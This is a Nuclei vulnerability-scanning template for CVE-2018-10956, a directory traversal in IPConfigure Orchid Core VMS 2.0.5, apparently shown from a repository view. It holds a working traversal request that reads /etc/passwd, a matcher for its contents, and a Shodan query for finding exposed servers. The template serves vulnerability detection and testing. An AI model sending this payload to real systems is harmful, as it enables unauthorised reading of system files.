nuclei-templates/cves/2018/CVE-2018-10956.yaml

35 lines
1.0 KiB
YAML
Raw Normal View History

2022-04-10 08:47:46 +00:00
id: CVE-2018-10956
2022-04-10 08:47:46 +00:00
info:
name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal.
author: 0x_Akoko
severity: high
description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal.
reference:
- https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
- https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb
2022-04-10 08:47:46 +00:00
- https://www.cvedetails.com/cve/CVE-2018-10956
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 7.5
cve-id: CVE-2018-10956
cwe-id: CWE-22
metadata:
shodan-query: http.title:"Orchid Core VMS"
tags: cve,cve2018,orchid,vms,lfi
2022-04-10 08:47:46 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"
2022-04-10 08:47:46 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2022-04-10 08:47:46 +00:00
- type: status
status:
- 200